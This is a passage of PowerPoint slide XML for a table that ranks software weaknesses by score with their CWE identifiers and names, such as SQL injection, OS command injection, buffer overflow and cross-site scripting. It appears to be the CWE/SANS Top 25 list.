                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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r>
              <a:tr h="669350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[1]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>93.8</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>CWE-89</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Improper Neutralization of Special Elements used in an SQL Command ('</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>SQL Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>')</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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r>
              <a:tr h="669350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[2]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>83.3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CWE-78</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Improper Neutralization of Special Elements used in an OS Command ('</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>OS Command Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>')</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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r>
              <a:tr h="448275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[3]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>79.0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>CWE-120</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Buffer Copy without Checking Size of Input ('</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Classic Buffer Overflow</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>')</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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r>
              <a:tr h="558800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[4]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>77.7</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>CWE-79</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Improper Neutralization of Input During Web Page Generation ('</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Cross-site Scripting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>')</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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r>
              <a:tr h="337750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[5]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>76.9</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>CWE-306</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Missing Authentication for Critical Function</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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r>
              <a:tr h="116675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[6]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>76.8</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>CWE-862</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Missing Authorization</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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r>
              <a:tr h="227200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[7]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>75.0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>CWE-798</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Use of Hard-coded Credentials</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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r>
              <a:tr h="227200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[8]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>75.0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>CWE-311</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Missing Encryption of Sensitive Data</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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r>
              <a:tr h="337750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[9]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>74.0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>CWE-434</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Unrestricted Upload of File with Dangerous Type</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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r>
              <a:tr h="337750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[10]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>73.8</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>CWE-807</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Reliance on Untrusted Inputs in a Security Decision</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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r>
              <a:tr h="337750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[11]</a:t>
                      </a:r>
                    </a:p>
